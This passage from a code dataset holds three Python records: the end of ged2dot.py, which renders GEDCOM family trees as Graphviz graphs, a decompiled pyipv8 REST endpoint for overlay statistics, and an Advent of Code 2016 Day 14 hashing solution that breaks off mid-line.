Subgraph.Start(name)\n\n def prepend(self, element: Renderable) -> None:\n self.elements.insert(0, element)\n\n def append(self, element: Renderable) -> None:\n self.elements.append(element)\n\n def end(self) -> None:\n self.append(Subgraph.End())\n\n def render(self, out: TextIO) -> None:\n self.start.render(out)\n for i in self.elements:\n i.render(out)\n out.write(\"\\n\")\n\n def find_family(self, family: Family) -> Tuple[str, int]:\n \"\"\"Find the wife or husb or a family in this subgraph.\n If any of them are found, return the individual's ID and pos.\"\"\"\n count = 0\n for element in self.elements:\n if element.__class__ == Node:\n node = cast(Node, element)\n if family.wife and node.node_id == family.wife.iid:\n return (family.wife.iid, count)\n if family.husb and node.node_id == family.husb.iid:\n return (family.husb.iid, count)\n count += 1\n return (\"\", 0)\n\n def get_prev_of(self, individual: Individual) -> Optional[Individual]:\n \"\"\"The passed individual follows the returned ID in this subgraph.\"\"\"\n for element in self.elements:\n if element.__class__ == Edge:\n edge = cast(Edge, element)\n if hasattr(individual, 'iid') and edge.to_node == individual.iid:\n return self.model.get_individual(edge.from_node)\n\n return None\n\n\nclass Marriage:\n \"\"\"Kind of a fake node, produced from a family.\"\"\"\n def __init__(self, family: Family) -> None:\n self.family = family\n\n def get_name(self) -> str:\n return \"%sAnd%s\" % (self.family.get_husb().iid, self.family.get_wife().iid)\n\n def get_node(self) -> Node:\n husb = self.family.get_husb().get_full_name()\n wife = self.family.get_wife().get_full_name()\n return Node(self.get_name(), visiblePoint=True, comment=\"%s, %s\" % (husb, wife))\n\n\nclass Layout:\n \"\"\"Generates the graphviz digraph, contains subgraphs.\n The stock layout shows ancestors of a root family.\"\"\"\n def __init__(self, model: Model, out: TextIO) -> None:\n self.model = model\n self.out = out\n self.subgraphs = [] # type: List[Subgraph]\n # List of families, which are directly interesting for us.\n self.filtered_families = [] # type: List[Family]\n\n def append(self, subgraph: Subgraph) -> None:\n self.subgraphs.append(subgraph)\n\n def render(self) -> None:\n self.out.write(\"digraph tree {\\n\")\n self.out.write(\"splines = ortho\\n\")\n for i in 
self.subgraphs:\n i.render(self.out)\n self.out.write(\"}\\n\")\n\n def get_subgraph(self, id_string: str) -> Optional[Subgraph]:\n for subgraph in self.subgraphs:\n if subgraph.name == id_string:\n return subgraph\n return None\n\n def make_edge(self, from_id: str, to_id: str, invisible: bool = False, comment: Optional[str] = None) -> Edge:\n return Edge(self.model, from_id, to_id, invisible=invisible, comment=comment)\n\n def filter_families(self) -> List[Family]:\n \"\"\"Iterate over all families, find out directly interesting and sibling\n families. Populates filtered_families, returns sibling ones.\"\"\"\n\n family = self.model.get_family(self.model.config.rootFamily)\n if not family:\n raise NoSuchFamilyException(\"Can't find family '%s' in the input file.\" % self.model.config.rootFamily)\n self.filtered_families = [family]\n\n depth = 0\n pendings = [family]\n # List of families, which are interesting for us, as A is in the\n # family, B is in filtered_families, and A is a sibling of B.\n sibling_families = []\n while depth < self.model.config.layoutMaxDepth:\n next_pendings = []\n for pending in pendings:\n children = [] # type: List[str]\n for indi in ('husb', 'wife'):\n if getattr(pending, indi):\n indi_family = getattr(pending, indi).famc\n if indi_family:\n indi_family.depth = depth + 1\n self.filtered_families.append(indi_family)\n next_pendings.append(indi_family)\n children += indi_family.chil\n\n # Also collect children's family.\n if depth < self.model.config.layoutMaxSiblingSpouseDepth + 1:\n # +1, because children are in the previous generation.\n for chil in children:\n individual = self.model.get_individual(chil)\n if not individual:\n raise NoSuchIndividualException(\"Can't find individual '%s' in the input file.\" % chil)\n chil_family = individual.fams\n if not chil_family or self.model.get_family(chil_family.fid, self.filtered_families):\n continue\n chil_family.depth = depth\n sibling_families.append(chil_family)\n pendings = next_pendings\n depth += 1\n\n for i in self.filtered_families:\n i.sort_children(self.filtered_families)\n\n return sibling_families\n\n def build_subgraph(self, depth: int, pending_child_nodes: List[Renderable], descendants: bool = False) -> List[Renderable]:\n \"\"\"Builds a subgraph, that contains the real nodes for a generation.\n This consists of:\n\n 1) Wife / husb of a family that has the matching depth\n 2) Pending children from the previous generation.\n\n Returns pending children for the next subgraph.\"\"\"\n subgraph = Subgraph(self.model.escape(\"Depth%s\" % depth), self.model)\n for child in pending_child_nodes:\n subgraph.append(child)\n pending_child_nodes = []\n\n pending_children_deps = []\n prev_wife = None\n prev_chil = None\n for family in [f for f in self.filtered_families if f.depth == depth]:\n husb = family.get_husb()\n subgraph.append(husb.get_node())\n if prev_wife:\n subgraph.append(self.make_edge(prev_wife.iid, family.husb.iid, invisible=True))\n wife = family.get_wife()\n subgraph.append(wife.get_node())\n prev_wife = family.wife\n marriage = Marriage(family)\n subgraph.append(marriage.get_node())\n subgraph.append(self.make_edge(family.get_husb().iid, marriage.get_name(), comment=family.get_husb().get_full_name()))\n subgraph.append(self.make_edge(marriage.get_name(), family.get_wife().iid, comment=family.get_wife().get_full_name()))\n for family_child in family.chil:\n individual = self.model.get_individual(family_child)\n if individual and family.depth > self.model.config.layoutMaxSiblingDepth and 
individual.fams not in self.filtered_families:\n continue\n if not individual:\n raise NoSuchIndividualException(\"Can't find individual '%s' in the input file.\" % family_child)\n pending_child_nodes.append(individual.get_node())\n if prev_chil:\n # In case family_child is female and has a husb, then link prev_child to husb,\n # not to family_child.\n handled = False\n family_child_indi = self.model.get_individual(family_child)\n if descendants and family_child_indi.sex == 'F':\n family_child_family = family_child_indi.fams\n if family_child_family and family_child_family.husb:\n pending_child_nodes.append(self.make_edge(prev_chil, family_child_family.husb.iid, invisible=True))\n handled = True\n if not handled:\n pending_child_nodes.append(self.make_edge(prev_chil, family_child, invisible=True))\n prev_chil = family_child\n pending_children_deps.append(self.make_edge(\"%sConnect\" % family_child, family_child, comment=individual.get_full_name()))\n subgraph.end()\n for i in pending_children_deps:\n subgraph.append(i)\n self.append(subgraph)\n return pending_child_nodes\n\n def build_connector_subgraph(self, depth: int) -> None:\n \"\"\"Does the same as build_subgraph(), but deals with connector nodes.\"\"\"\n subgraph = Subgraph(self.model.escape(\"Depth%sConnects\" % depth), self.model)\n pending_deps = []\n prev_child = None\n for family in [f for f in self.filtered_families if f.depth == depth]:\n marriage = Marriage(family)\n children = family.chil[:]\n if not (len(children) % 2 == 1 or not children):\n # If there is no middle child, then insert a fake node here, so\n # marriage can connect to that one.\n half = int(len(children) / 2)\n children.insert(half, marriage.get_name())\n for child in children:\n individual = self.model.get_individual(child)\n if individual:\n if family.depth > self.model.config.layoutMaxSiblingDepth and individual.fams not in self.filtered_families:\n continue\n subgraph.append(Node(\"%sConnect\" % child, point=True, comment=individual.get_full_name()))\n else:\n subgraph.append(Node(\"%sConnect\" % child, point=True))\n\n middle = int(len(children) / 2)\n count = 0\n for child in children:\n individual = self.model.get_individual(child)\n if individual and family.depth > self.model.config.layoutMaxSiblingDepth and individual.fams not in self.filtered_families:\n continue\n if count < middle:\n if not individual:\n raise NoSuchIndividualException(\"Can't find individual '%s' in the input file.\" % child)\n subgraph.append(self.make_edge(\"%sConnect\" % child, \"%sConnect\" % children[count + 1], comment=individual.get_full_name()))\n elif count == middle:\n if individual:\n pending_deps.append(self.make_edge(marriage.get_name(), \"%sConnect\" % child, comment=individual.get_full_name()))\n else:\n pending_deps.append(self.make_edge(marriage.get_name(), \"%sConnect\" % child))\n elif count > middle:\n if not individual:\n raise NoSuchIndividualException(\"Can't find individual '%s' in the input file.\" % child)\n subgraph.append(self.make_edge(\"%sConnect\" % children[count - 1], \"%sConnect\" % child, comment=individual.get_full_name()))\n if prev_child:\n subgraph.append(self.make_edge(\"%sConnect\" % prev_child, \"%sConnect\" % child, invisible=True))\n prev_child = None\n count += 1\n if children:\n prev_child = children[-1]\n subgraph.end()\n for dep in pending_deps:\n subgraph.append(dep)\n self.append(subgraph)\n\n def __add_sibling_spouses(self, family: Family) -> None:\n \"\"\"Add husb and wife from a family to the layout.\"\"\"\n depth = 
family.depth\n        subgraph = self.get_subgraph(self.model.escape(\"Depth%s\" % depth))\n        assert subgraph\n        existing_indi, existing_pos = subgraph.find_family(family)\n        new_indi = None\n        if family.wife and existing_indi == family.wife.iid:\n            new_indi = family.husb\n        else:\n            new_indi = family.wife\n        if not new_indi:\n            # No spouse, probably has children. Ignore for now.\n            return\n        found = False\n        for element in subgraph.elements:\n            if existing_indi == family.wife.iid and element.__class__ == Edge and cast(Edge, element).to_node == existing_indi:\n                cast(Edge, element).to_node = new_indi.iid\n            elif existing_indi == family.husb.iid and element.__class__ == Edge and cast(Edge, element).from_node == existing_indi:\n                cast(Edge, element).from_node = new_indi.iid\n            found = True\n        assert found\n        subgraph.elements.insert(existing_pos, new_indi.get_node())\n\n        marriage = Marriage(family)\n        subgraph.elements.insert(existing_pos, marriage.get_node())\n\n        subgraph.append(self.make_edge(family.husb.iid, marriage.get_name(), comment=family.husb.get_full_name()))\n        subgraph.append(self.make_edge(marriage.get_name(), family.wife.iid, comment=family.wife.get_full_name()))\n\n    def __add_sibling_children(self, family: Family) -> None:\n        \"\"\"Add children from a sibling family to the layout.\"\"\"\n        depth = family.depth\n\n        if depth > self.model.config.layoutMaxSiblingFamilyDepth:\n            return\n\n        subgraph = self.get_subgraph(self.model.escape(\"Depth%s\" % depth))\n        assert subgraph\n        prev_parent = subgraph.get_prev_of(family.husb)\n        if not prev_parent or not prev_parent.fams or not prev_parent.fams.chil:\n            # TODO: handle cousins in this case; handle None prev_parent.fams\n            return\n        last_child = prev_parent.fams.chil[-1]\n\n        # First, add connect nodes and their deps.\n        subgraph_connect = self.get_subgraph(self.model.escape(\"Depth%sConnects\" % depth))\n        assert subgraph_connect\n\n        marriage = Marriage(family)\n        subgraph_connect.prepend(Node(\"%sConnect\" % marriage.get_name(), point=True))\n        subgraph_connect.append(self.make_edge(marriage.get_name(), \"%sConnect\" % marriage.get_name()))\n\n        children = family.chil[:]\n        if len(children) % 2 == 0:\n            # If there is no middle child, then insert a fake node here, so\n            # marriage can connect to that one.\n            half = int(len(children) / 2)\n            children.insert(half, marriage.get_name())\n\n        prev_child = last_child\n        for chil in children:\n            if prev_child not in children:\n                subgraph_connect.prepend(self.make_edge(\"%sConnect\" % prev_child, \"%sConnect\" % chil, invisible=True))\n            else:\n                subgraph_connect.prepend(self.make_edge(\"%sConnect\" % prev_child, \"%sConnect\" % chil))\n            subgraph_connect.prepend(Node(\"%sConnect\" % chil, point=True))\n            prev_child = chil\n\n        # Then, add the real nodes.\n        subgraph_child = self.get_subgraph(self.model.escape(\"Depth%s\" % (depth - 1)))\n        assert subgraph_child\n        prev_child = last_child\n        for chil in family.chil:\n            subgraph_child.prepend(self.make_edge(prev_child, chil, invisible=True))\n            individual = self.model.get_individual(chil)\n            if not individual:\n                raise NoSuchIndividualException(\"Can't find individual '%s' in the input file.\" % chil)\n            subgraph_child.prepend(individual.get_node())\n            subgraph_child.append(self.make_edge(\"%sConnect\" % chil, chil))\n            prev_child = chil\n\n    def calc(self) -> None:\n        \"\"\"Tries to arrange nodes on a logical grid. 
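# ---------------------------------------------------------------------------
# Illustrative aside (not part of this file): the layout idea used by calc()
# is to emit one "rank = same" subgraph per generation, so graphviz keeps each
# generation on its own horizontal row, while "splines = ortho" keeps the
# connecting edges rectilinear. A minimal, self-contained sketch of that
# output shape follows; the function and node names here are made up for the
# example, and real ged2dot additionally emits edges and connector nodes.
import io
from typing import List


def render_generations(generations: List[List[str]]) -> str:
    """Emit a tiny digraph with one rank-constrained subgraph per generation."""
    out = io.StringIO()
    out.write("digraph tree {\n")
    out.write("splines = ortho\n")
    for depth, names in enumerate(generations):
        # Every node listed inside this subgraph shares one horizontal rank.
        out.write("subgraph Depth%s {\n" % depth)
        out.write("rank = same\n")
        for name in names:
            out.write("%s\n" % name)
        out.write("}\n")
    out.write("}\n")
    return out.getvalue()


# Two generations: the parents share row 0, the child sits alone on row 1.
print(render_generations([["father", "mother"], ["child"]]))
# ---------------------------------------------------------------------------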
Only logical order is\n defined, the exact positions and sizes are still determined by\n graphviz.\"\"\"\n\n sibling_families = self.filter_families()\n\n # Children from generation N are nodes in the N+1th generation.\n pending_child_nodes = [] # type: List[Renderable]\n for depth in reversed(list(range(-1, self.model.config.layoutMaxDepth + 1))):\n # Draw two subgraphs for each generation. The first contains the real nodes.\n pending_child_nodes = self.build_subgraph(depth, pending_child_nodes)\n # The other contains the connector nodes.\n self.build_connector_subgraph(depth)\n\n # Now add the side-families.\n for family in sibling_families:\n self.__add_sibling_spouses(family)\n\n # Any children to take care of?\n if family.chil:\n self.__add_sibling_children(family)\n\n\nclass DescendantsLayout(Layout):\n \"\"\"A layout that shows all descendants of a root family.\"\"\"\n def filter_families(self) -> List[Family]:\n family = self.model.get_family(self.model.config.rootFamily)\n assert family\n self.filtered_families = [family]\n\n depth = 0\n pendings = [family]\n while depth < self.model.config.layoutMaxDepth:\n next_pendings = []\n for pending in pendings:\n for indi in pending.chil:\n individual = self.model.get_individual(indi)\n assert individual\n indi_family = individual.fams\n if indi_family:\n indi_family.depth = depth + 1\n self.filtered_families.append(indi_family)\n next_pendings.append(indi_family)\n pendings = next_pendings\n depth += 1\n\n return []\n\n def calc(self) -> None:\n self.filter_families()\n\n pending_child_nodes = [] # type: List[Renderable]\n for depth in range(self.model.config.layoutMaxDepth + 1):\n pending_child_nodes = self.build_subgraph(depth, pending_child_nodes, descendants=True)\n self.build_connector_subgraph(depth)\n\n\n# Import filter\n\nclass GedcomImport:\n \"\"\"Builds the model from GEDCOM.\"\"\"\n def __init__(self, inf: BinaryIO, model: Model) -> None:\n self.inf = inf\n self.model = model\n self.indi = None # type: Optional[Individual]\n self.family = None # type: Optional[Family]\n self.in_birt = False\n self.in_deat = False\n\n def load(self) -> None:\n linecount = 0\n\n for i in self.inf.readlines():\n line = i.strip().decode(self.model.config.inputEncoding)\n linecount += 1\n tokens = line.split(' ')\n\n first_token = tokens[0]\n # Ignore UTF-8 BOM, if there is one at the begining of the line.\n if first_token.startswith(\"\\ufeff\"):\n first_token = first_token[1:]\n\n level = int(first_token)\n rest = \" \".join(tokens[1:])\n # try to identify lines with errors\n try:\n if level == 0:\n if self.indi:\n self.model.individuals.append(self.indi)\n self.indi = None\n if self.family:\n self.model.families.append(self.family)\n self.family = None\n\n if rest.startswith(\"@\") and rest.endswith(\"INDI\"):\n id_string = rest[1:-6]\n if id_string not in self.model.config.indiBlacklist:\n self.indi = Individual(self.model)\n self.indi.iid = rest[1:-6]\n elif rest.startswith(\"@\") and rest.endswith(\"FAM\"):\n self.family = Family(self.model)\n self.family.fid = rest[1:-5]\n\n elif level == 1:\n if self.in_birt:\n self.in_birt = False\n elif self.in_deat:\n self.in_deat = False\n\n if rest.startswith(\"SEX\") and self.indi:\n self.indi.sex = rest.split(' ')[1]\n elif rest.startswith(\"NAME\") and self.indi:\n rest = rest[5:]\n tokens = rest.split('/')\n self.indi.forename = tokens[0].strip()\n if len(tokens) > 1:\n self.indi.surname = tokens[1].strip()\n elif rest.startswith(\"FAMC\") and self.indi:\n # Child in multiple families? 
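# ---------------------------------------------------------------------------
# Illustrative aside (not part of this file): every GEDCOM line consumed by
# load() above has the shape "LEVEL [@XREF@] TAG [VALUE]". A stand-alone
# sketch of the same "level + rest" split, including the BOM tolerance; the
# helper name and the sample lines are made up for the example.
from typing import Tuple


def split_gedcom_line(line: str) -> Tuple[int, str]:
    """Return (level, rest) for one GEDCOM line, mirroring the loop above."""
    tokens = line.strip().split(' ')
    first_token = tokens[0].lstrip('\ufeff')  # tolerate a UTF-8 BOM
    return int(first_token), ' '.join(tokens[1:])


assert split_gedcom_line('0 @P1@ INDI') == (0, '@P1@ INDI')
assert split_gedcom_line('1 NAME John /Doe/') == (1, 'NAME John /Doe/')
# ---------------------------------------------------------------------------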
That's crazy...\n if not self.indi.famc:\n self.indi.famc = rest[6:-1]\n elif rest.startswith(\"FAMS\") and self.indi:\n self.indi.fams = rest[6:-1]\n elif rest.startswith(\"BIRT\"):\n self.in_birt = True\n elif rest.startswith(\"DEAT\"):\n self.in_deat = True\n elif rest.startswith(\"HUSB\") and self.family:\n self.family.husb = rest[6:-1]\n elif rest.startswith(\"WIFE\") and self.family:\n self.family.wife = rest[6:-1]\n elif rest.startswith(\"CHIL\") and self.family:\n id_string = rest[6:-1]\n if id_string not in self.model.config.indiBlacklist:\n self.family.chil.append(rest[6:-1])\n\n elif level == 2:\n if rest.startswith(\"DATE\") and self.indi:\n year = rest.split(' ')[-1]\n if self.in_birt:\n self.indi.set_birt(year)\n elif self.in_deat:\n self.indi.deat = year\n\n # pylint: disable=broad-except\n except Exception as exc:\n sys.stderr.write(\"Encountered parsing error in .ged: \" + str(exc) + \"\\n\")\n sys.stderr.write(\"line (%d): %s\\n\" % (linecount, line))\n sys.exit(1)\n\n# Configuration handling\n\n\nclass Config:\n layoutMaxDepthDefault = '5'\n rootFamilyDefault = 'F1'\n nodeBorderWidthDefault = '1.0'\n nodeLabelImageDefault = '<
<table border=\"0\" cellborder=\"0\"><tr><td><img src=\"%(picture)s\"/></td></tr><tr><td>%(forename)s<br/>%(surname)s<br/>%(birt)s-%(deat)s</td></tr></table>
>'\n nodeLabelImageSwappedDefault = '<
<table border=\"0\" cellborder=\"0\"><tr><td><img src=\"%(picture)s\"/></td></tr><tr><td>%(surname)s<br/>%(forename)s<br/>%(birt)s-%(deat)s</td></tr></table>
>'\n\n def __init__(self, config_dict: Any) -> None:\n self.config_dict = config_dict\n self.parse()\n\n def parse(self) -> None:\n path = None\n\n if isinstance(self.config_dict, list):\n args = cast(List[str], self.config_dict)\n if args:\n path = args[0]\n else:\n path = \"ged2dotrc\"\n else:\n args = []\n\n self.parser = configparser.RawConfigParser()\n if not path:\n self.parser.read_dict(self.config_dict)\n else:\n self.parser.read(path)\n self.option = {} # type: Dict[str, Any]\n for entry in CONFIG_OPTIONS:\n if entry[1] == 'str':\n self.option[entry[0]] = self.get(entry[0], entry[2])\n elif entry[1] == 'int':\n self.option[entry[0]] = int(self.get(entry[0], entry[2]))\n elif entry[1] == 'bool':\n self.option[entry[0]] = (self.get(entry[0], entry[2]).lower() == \"true\")\n\n @staticmethod\n def usage() -> None:\n sys.stdout.write(\"\\n -- Sample config file below --\\n\")\n sys.stdout.write(\" Un-comment all options where the given default does not fit your needs\\n\")\n sys.stdout.write(\" and either save as \\\"ged2dotrc\\\" or provide the filename as first argument\\n\")\n\n sys.stdout.write(\"\\n--------\\n\")\n sys.stdout.write(\"[ged2dot]\\n\")\n for entry in CONFIG_OPTIONS:\n for i in entry[3].split('\\n'):\n sys.stdout.write(\"#%s\\n\" % i)\n sys.stdout.write(\"#type: %s\\n\" % entry[1])\n sys.stdout.write(\"#%s = %s\\n\\n\" % (entry[0], entry[2]))\n sys.stdout.write(\"--------\\n\")\n\n def __getattr__(self, attr: str) -> Any:\n if attr in self.__dict__:\n return self.__dict__[attr]\n if attr in self.__dict__[\"option\"]:\n return self.__dict__[\"option\"][attr]\n return None\n\n def get(self, what: str, fallback: str = configparser._UNSET) -> str: # type: ignore # This is incompatible with MutableMapping, says configparser.pyi\n return self.parser.get('ged2dot', what, fallback=fallback).split('#')[0]\n\n\n# (name, type, default, description)\nCONFIG_OPTIONS = (\n ('input', 'str', \"test.ged\", \"Input filename (GEDCOM file)\"),\n ('rootFamily', 'str', Config.rootFamilyDefault, \"Starting from family with this identifier\"),\n\n ('considerAgeDead', 'int', \"120\", \"Consider someone dead at this age: put a question mark if death date is missing.\"),\n ('anonMode', 'bool', 'False', \"Anonymous mode: avoid any kind of sensitive data in the output.\"),\n ('images', 'bool', 'True', \"Should the output contain images?\"),\n ('imageFormat', 'str', 'images/%(forename)s %(surname)s %(birt)s.jpg', \"\"\"If images is True: format of the image paths.\nUse a path relative to \\\"input\\\" document here!\nPossible variables: %(forename)s, %(surname)s, %(birt)s and %(gwIndex)s.\nwhere gwIndex is 0 unless there are more individuals with the same forename and surname\"\"\"),\n ('imageFormatCase', 'str', '', \"\"\"Should the filenames (from \\\"imageFormat\\\") be converted?\nPossible values: \\\"\\\" - don't convert\n \\\"upper\\\" - convert all characters to upper case\n \\\"lower\\\" - convert all characters to lower case (use this for geneweb export)\n\"\"\"),\n ('imageFormatGeneweb', 'bool', 'False', \"\"\"Convert some special characters in the imagefilename\nto find pictures of geneweb (also set imageFormatCase to lower for geneweb images)\n\"\"\"),\n\n ('nodeLabelImage', 'str', Config.nodeLabelImageDefault, \"\"\"If images is True: label text of nodes.\nPossible values: %(picture)s, %(surname)s, %(forename)s, %(birt)s and %(deat)s.\"\"\"),\n\n ('nodeLabelPlain', 'str', '\"%(forename)s\\\\n%(surname)s\\\\n%(birt)s-%(deat)s\"', \"\"\"If images is False: label text of nodes.\nPossible 
values: %(picture)s, %(surname)s, %(forename)s, %(birt)s and %(deat)s.\"\"\"),\n    ('nodeBorderWidth', 'str', Config.nodeBorderWidthDefault, \"\"\"The box pencil thickness on individual person boxes. It should be a floating point number. Default=1.0\"\"\"),\n\n    ('edgeInvisibleRed', 'bool', 'False', \"Invisible edges: red for debugging or really invisible?\"),\n    ('edgeVisibleDirected', 'bool', 'False', \"Visible edges: show direction for debugging?\"),\n    ('layoutMaxDepth', 'int', Config.layoutMaxDepthDefault, \"Number of ancestor generations to show.\"),\n\n    ('layoutMaxSiblingDepth', 'int', Config.layoutMaxDepthDefault, \"Number of ancestor generations, where also siblings are shown.\"),\n    ('layoutMaxSiblingSpouseDepth', 'int', Config.layoutMaxDepthDefault, \"Number of ancestor generations, where also sibling spouses are shown.\"),\n    ('layoutMaxSiblingFamilyDepth', 'int', '1', \"\"\"Number of ancestor generations, where also sibling families are shown.\nIt's 1 by default, as values >= 2 cause edges to overlap each other in general.\"\"\"),\n\n    ('indiBlacklist', 'str', '', \"\"\"Comma-separated list of individual IDs to hide from the output for debugging.\nExample: \\\"P526, P525\\\".\"\"\"),\n\n    ('layout', 'str', '', \"Currently supported: \\\"\\\" or Descendants\"),\n\n    ('inputEncoding', 'str', 'UTF-8', \"\"\"Encoding of the GEDCOM input,\nfor example \\\"UTF-8\\\" or \\\"ISO 8859-15\\\".\"\"\"),\n\n    ('outputEncoding', 'str', 'UTF-8', \"\"\"Encoding of the output file;\nshould be UTF-8 for dot files.\"\"\"),\n)\n\n\ndef main() -> None:\n    if not os.path.exists(\"ged2dotrc\"):\n        sys.stderr.write(\"Fatal: ged2dotrc configuration file doesn't exist.\\nCreate a config file similar to test/screenshotrc, name it ged2dotrc and continue.\\n\")\n        sys.exit(1)\n    try:\n        config = Config(sys.argv[1:])\n    # pylint: disable=broad-except\n    except (BaseException) as base_exception:\n        sys.stderr.write(\"Configuration invalid? 
%s\\n\" % (str(base_exception)))\n sys.exit(1)\n\n if len(sys.argv) > 1 and (sys.argv[1] == \"--help\" or sys.argv[1] == \"-h\"):\n config.usage()\n sys.exit(0)\n\n model = Model(config)\n try:\n model.load(config.input)\n except (BaseException) as base_exception:\n sys.stderr.write(\"error in tree file:\\n\")\n raise base_exception\n if sys.version_info[0] < 3:\n sys.stdout = codecs.getwriter(config.outputEncoding)(sys.stdout)\n model.save(sys.stdout)\n\n\nif __name__ == \"__main__\":\n main()\n\n# vim:set shiftwidth=4 softtabstop=4 expandtab:\n","sub_path":"ged2dot.py","file_name":"ged2dot.py","file_ext":"py","file_size_in_byte":41960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"582475828","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: /Users/martijndevos/Documents/anydex-core/anydex/../pyipv8/ipv8/REST/overlays_endpoint.py\n# Compiled at: 2019-06-09 10:04:13\nfrom __future__ import absolute_import\nfrom binascii import hexlify\nfrom twisted.web import http\nfrom .base_endpoint import BaseEndpoint\nfrom ..messaging.interfaces.statistics_endpoint import StatisticsEndpoint\n\nclass OverlaysEndpoint(BaseEndpoint):\n \"\"\"\n This endpoint is responsible for handing all requests regarding the status of overlays.\n \"\"\"\n\n def __init__(self, session):\n super(OverlaysEndpoint, self).__init__()\n self.session = session\n self.putChild('statistics', OverlayStatisticsEndpoint(session))\n\n def get_overlays(self):\n overlay_stats = []\n for overlay in self.session.overlays:\n peers = overlay.get_peers()\n statistics = self.session.endpoint.get_aggregate_statistics(overlay.get_prefix()) if isinstance(self.session.endpoint, StatisticsEndpoint) else {}\n overlay_stats.append({'master_peer': hexlify(overlay.master_peer.public_key.key_to_bin()).decode('utf-8'), \n 'my_peer': hexlify(overlay.my_peer.public_key.key_to_bin()).decode('utf-8'), \n 'global_time': overlay.global_time, \n 'peers': [ str(peer) for peer in peers ], 'overlay_name': overlay.__class__.__name__, \n 'statistics': statistics})\n\n return overlay_stats\n\n def render_GET(self, request):\n return self.twisted_dumps({'overlays': self.get_overlays()})\n\n\nclass OverlayStatisticsEndpoint(BaseEndpoint):\n \"\"\"\n This endpoint is responsible for handing all requests regarding the statistics of overlays.\n \"\"\"\n\n def __init__(self, session):\n super(OverlayStatisticsEndpoint, self).__init__()\n self.session = session\n self.statistics_supported = isinstance(self.session.endpoint, StatisticsEndpoint)\n\n def get_statistics(self):\n overlay_stats = []\n for overlay in self.session.overlays:\n statistics = self.session.endpoint.get_statistics(overlay.get_prefix()) if self.statistics_supported else {}\n overlay_stats.append({overlay.__class__.__name__: self.statistics_by_name(statistics, overlay)})\n\n return overlay_stats\n\n def statistics_by_name(self, statistics, overlay):\n named_statistics = {}\n for message_id, network_stats in statistics.items():\n if overlay.decode_map.get(chr(message_id)):\n mapped_name = str(message_id) + ':' + overlay.decode_map[chr(message_id)].__name__\n else:\n mapped_name = str(message_id) + ':unknown'\n mapped_value = network_stats.to_dict()\n named_statistics[mapped_name] = mapped_value\n\n return named_statistics\n\n def render_GET(self, _):\n return self.twisted_dumps({'statistics': 
self.get_statistics()})\n\n def render_POST(self, request):\n \"\"\"\n .. http:post:: /overlays/statistics\n\n A POST request to this endpoint will enable statistics on the given overlay.\n - enable: whether to enable or disable the statistics (True/False)\n - overlay_name: class name of the overlay\n - all: if set to True, update applies to all overlays\n\n **Example request**:\n\n .. sourcecode:: none\n\n curl -X PUT http://localhost:8085/ipv8/overlays/statistics\n --data \"enable=True&overlay_name=overlay_name&all=True\n\n **Example response**:\n\n .. sourcecode:: javascript\n\n {\"success\": True}\n \"\"\"\n if not self.statistics_supported:\n request.setResponseCode(http.PRECONDITION_FAILED)\n return self.twisted_dumps({'success': False, 'error': 'StatisticsEndpoint is not enabled.'})\n else:\n all_overlays = False\n overlay_name = None\n if 'enable' not in request.args or not request.args['enable']:\n request.setResponseCode(http.BAD_REQUEST)\n return self.twisted_dumps({'success': False, 'error': \"Parameter 'enable' is required\"})\n enable = request.args['enable'][0] == 'True'\n if 'all' in request.args and request.args['all']:\n all_overlays = request.args['all'][0] == 'True'\n elif 'overlay_name' in request.args and request.args['overlay_name']:\n overlay_name = request.args['overlay_name'][0]\n else:\n request.setResponseCode(http.PRECONDITION_FAILED)\n return self.twisted_dumps({'success': False, 'error': \"Parameter 'all' or 'overlay_name' is required\"})\n self.enable_overlay_statistics(enable=enable, class_name=overlay_name, all_overlays=all_overlays)\n return self.twisted_dumps({'success': True})\n\n def enable_overlay_statistics(self, enable=False, class_name=None, all_overlays=False):\n if all_overlays:\n for overlay in self.session.overlays:\n self.session.endpoint.enable_community_statistics(overlay.get_prefix(), enable)\n\n elif class_name:\n for overlay in self.session.overlays:\n if overlay.__class__.__name__ == class_name:\n self.session.endpoint.enable_community_statistics(overlay.get_prefix(), enable)","sub_path":"pycfiles/anyencoder-0.0.3.tar/overlays_endpoint.py","file_name":"overlays_endpoint.py","file_ext":"py","file_size_in_byte":5507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"36711616","text":"# coding=utf-8\n\"\"\"Advent of Code 2016, Day 14, Part 2\"\"\"\n\nimport hashlib\n\n\ndef get_hash(string):\n \"\"\"\n Calculate the MD5 hash of a given string, repeated 2017 times.\n :param string: the given string\n :return: hexadecimal hash of the string\n \"\"\"\n for _ in range(2017):\n string = hashlib.md5(string.encode()).hexdigest()\n return string\n\n\ndef get_repeating_sequence(string):\n \"\"\"\n Determine the first thrice-repeating character within a string.\n :param string: the given string\n :return: the repeating character if it exists; None otherwise\n \"\"\"\n for position in range(len(string) - 2):\n sequence = string[position:position+3]\n if sequence == string[position] * 3:\n return sequence[0]\n return None\n\nwith open(\"input.txt\") as f:\n salt = f.read().rstrip(\"\\n\")\n\nhashes = []\nkey_indexes = []\n\nfor i in range(1000):\n hashes.append(get_hash(salt + str(i)))\n\nindex = 0\nwhile len(key_indexes) < 64:\n hashes.append(get_hash(salt + str(index+1000)))\n candidate_key = hashes[index]\n candidate_character = get_repeating_sequence(candidate_key)\n if candidate_character:\n extended_sequence = candidate_character * 5\n if any(extended_sequence in hashed_string for 
